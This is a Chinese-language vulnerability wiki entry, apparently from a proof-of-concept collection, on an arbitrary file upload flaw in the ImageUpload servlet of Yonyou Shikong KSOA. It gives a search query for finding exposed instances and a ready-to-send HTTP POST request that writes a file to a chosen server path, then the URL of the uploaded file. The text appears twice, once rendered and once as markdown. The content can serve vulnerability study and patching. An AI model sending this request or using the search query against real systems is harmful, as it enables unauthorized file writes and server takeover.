fofamini-wiki

登录白背景

源码

用友时空KSOA ImageUpload 任意文件上传漏洞

一、漏洞简介

用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业前沿的IT需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话。用友时空KSOA平台ImageUpload处存在任意文件上传漏洞，攻击者通过漏洞可以获取服务器权限。

二、影响版本

用友时空KSOA

三、资产测绘

hunterapp.name="用友时空 KSOA"

登录页面

四、漏洞复现

⚠️：Content-type`header`头需为空

POST /servlet/com.sksoft.bill.ImageUpload?filename=1.txt&filepath=/ HTTP/1.1
User-Agent: Java/1.8.0_381
Host: {hostname}
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: 
Content-Length: 5
Connection: close

hello

上传文件路径

http://xx.xx.xx.xx/pictures/1.txt

原文: https://www.yuque.com/xiaokp7/ocvun2/idch0crhzzqnyuw5

# 用友时空KSOA ImageUpload 任意文件上传漏洞

# 一、漏洞简介
用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业前沿的IT需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话。用友时空KSOA平台ImageUpload处存在任意文件上传漏洞，攻击者通过漏洞可以获取服务器权限。

# 二、影响版本
+ 用友时空KSOA

# 三、资产测绘
+ hunter`app.name="用友时空 KSOA"`

![1692118414187-50a002bf-7b35-4a5e-9cca-410e053dfd86.png](./img/Ig0dVJxG948NY4S9/1692118414187-50a002bf-7b35-4a5e-9cca-410e053dfd86-978465.png)

+ 登录页面

![1692118428299-ee3e89a1-d166-4649-b288-943ccd7d5fc7.png](./img/Ig0dVJxG948NY4S9/1692118428299-ee3e89a1-d166-4649-b288-943ccd7d5fc7-862468.png)

# 四、漏洞复现
⚠️：`Content-type``header`头需为空

```plain
POST /servlet/com.sksoft.bill.ImageUpload?filename=1.txt&filepath=/ HTTP/1.1
User-Agent: Java/1.8.0_381
Host: {hostname}
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: 
Content-Length: 5
Connection: close

hello
```

![1692118462928-a7166004-a1a9-4f63-a550-0c8d6bdfa993.png](./img/Ig0dVJxG948NY4S9/1692118462928-a7166004-a1a9-4f63-a550-0c8d6bdfa993-534762.png)

上传文件路径

```plain
http://xx.xx.xx.xx/pictures/1.txt
```

![1692118498640-9ad7372b-ed60-458b-972d-b902bd0bccdc.png](./img/Ig0dVJxG948NY4S9/1692118498640-9ad7372b-ed60-458b-972d-b902bd0bccdc-150655.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/idch0crhzzqnyuw5>